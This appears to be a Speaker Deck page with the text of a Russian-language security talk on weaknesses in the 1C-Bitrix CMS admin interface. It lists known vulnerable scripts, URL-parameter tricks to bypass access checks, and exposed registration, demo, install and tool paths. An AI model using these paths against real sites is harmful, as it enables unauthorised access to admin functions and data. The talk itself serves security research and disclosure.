Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Выйди и зайди нормально
Search
Sponsored
·
SiteGround - Reliable hosting with speed, security, and support you can count on.
→
Bo0oM
September 13, 2023
Programming
0
95
Выйди и зайди нормально
О некоторых особенностях административного интерфейса CMS 1С-Битрикс
Bo0oM
September 13, 2023
Tweet
Share
More Decks by Bo0oM
See All by Bo0oM
Носок на сок
bo0om
0
1.9k
Защита от вредоносной автоматизации сегодня
bo0om
0
620
Defending against automatization using nginx
bo0om
0
860
Antibot pitch deck
bo0om
0
170
31337
bo0om
0
210
Your back is white
bo0om
0
380
FTP2RCE
bo0om
1
7.6k
Interpret it!
bo0om
0
1.2k
At Home Among Strangers
bo0om
1
4k
Other Decks in Programming
See All in Programming
AI Schema Enrichment for your Oracle AI Database
thatjeffsmith
0
300
CSC307 Lecture 01
javiergs
PRO
0
690
Package Management Learnings from Homebrew
mikemcquaid
0
230
責任感のあるCloudWatchアラームを設計しよう
akihisaikeda
3
180
余白を設計しフロントエンド開発を 加速させる
tsukuha
7
2.1k
AIエージェントのキホンから学ぶ「エージェンティックコーディング」実践入門
masahiro_nishimi
5
470
AIエージェント、”どう作るか”で差は出るか? / AI Agents: Does the "How" Make a Difference?
rkaga
4
2k
インターン生でもAuth0で 認証基盤刷新が出来るのか
taku271
0
190
SourceGeneratorのススメ
htkym
0
200
LLM Observabilityによる 対話型音声AIアプリケーションの安定運用
gekko0114
2
430
なるべく楽してバックエンドに型をつけたい!(楽とは言ってない)
hibiki_cube
0
140
Apache Iceberg V3 and migration to V3
tomtanaka
0
160
Featured
See All Featured
DBのスキルで生き残る技術 - AI時代におけるテーブル設計の勘所
soudai
PRO
62
50k
A Soul's Torment
seathinner
5
2.3k
Designing for Performance
lara
610
70k
Why You Should Never Use an ORM
jnunemaker
PRO
61
9.7k
Digital Projects Gone Horribly Wrong (And the UX Pros Who Still Save the Day) - Dean Schuster
uxyall
0
370
Practical Orchestrator
shlominoach
191
11k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
55
3.2k
How to Align SEO within the Product Triangle To Get Buy-In & Support - #RIMC
aleyda
1
1.4k
The Curse of the Amulet
leimatthew05
1
8.7k
Joys of Absence: A Defence of Solitary Play
codingconduct
1
290
Context Engineering - Making Every Token Count
addyosmani
9
660
The Hidden Cost of Media on the Web [PixelPalooza 2025]
tammyeverts
2
190
Transcript
«Выйди и зайди нормально!» Anton Lopanitsyn
КТО Я? • Тыкаю кавычки (атакую). • Запрещаю тыкать кавычки
(защищаю). • Пытаюсь в стартапы по ИБ (passleak.com, antibot.ru) – но нехватает денюшков • Исследую, развлекаюсь, рассказываю об этом Bo0oM
Как обычно ломают Bitrix? • restore.php Система восстановления файлов в
Bitrix • vote/uf.php CVE-2022-27228 • html_editor_action.php CVE-???, вроде ту же самую дали ей)))0) • уязвимости в самописных модулях не покрытых waf’ом Ну тут как будто без комментариев
Исправления
Исправления
None
Обходим первые защиты
SEF_APPLICATION_CUR_PAGE_URL /pewpew/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/
SEF_APPLICATION_CUR_PAGE_URL /pewpew/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/ /pewpew/?SEF%20APPLICATION%20CUR%20PAGE_URL=/bitrix/admin/ /pewpew/?SEF+APPLICATION%20CUR+PAGE[URL=/bitrix/admin/
None
None
None
/auth/?register=yes
/crm/?register=yes
/auth/oauth2/?register=yes
Demo /bitrix/wizards/bitrix/demo/public_files/ru/auth/index.php?register=yes /bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/c ustom-registration/index.php /bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/ my-components/news_list.php?register=yes /bitrix/wizards/bitrix/demo/modules/subscribe/public/personal/subscribe/subs cr_edit.php?register=YES&sf_EMAIL=
Demo
Demo
Install /bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/ public/ru/personal/profile/index.php?register=yes /bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/ public/ru/board/my/index.php?register=yes /bitrix/modules/forum/install/admin/forum_index.php
Install
None
Даже если взять и попасть в админку не удалось •
Можно почитать отзывы и обратную связь • Посмотреть списки рассылок • Собрать используемые плагины изнутри • Посмотреть настройки • Побрутить пароли • Собрать дополнительную информацию
Tools /bitrix/tools/catalog_export/yandex_detail.php /bitrix/tools/sale/discount_reindex.php /bitrix/tools/sale/basket_discount_convert.php
Tools
Tools /bitrix/tools/catalog/iblock_catalog_list.php?SHOWALL_1=1
Components /bitrix/components/bitrix/desktop/admin_settings.php /bitrix/components/bitrix/player/player_playlist_edit.php /bitrix/components/bitrix/map.yandex.search/settings/settings.php
Tools /bitrix/tools/bizproc_get_html_editor.php
/bitrix/modules/subscribe/public/subscr_edit.php
smtp
None
None
Никто не знает, что тут
SiteGround - Reliable hosting with speed, security, and support you can count on.
bo0om
thatjeffsmith
javiergs
mikemcquaid
akihisaikeda
tsukuha
masahiro_nishimi
rkaga
taku271
htkym
gekko0114
hibiki_cube
tomtanaka
soudai
seathinner
lara
jnunemaker
uxyall
shlominoach
tammyeverts
aleyda
leimatthew05
codingconduct
addyosmani
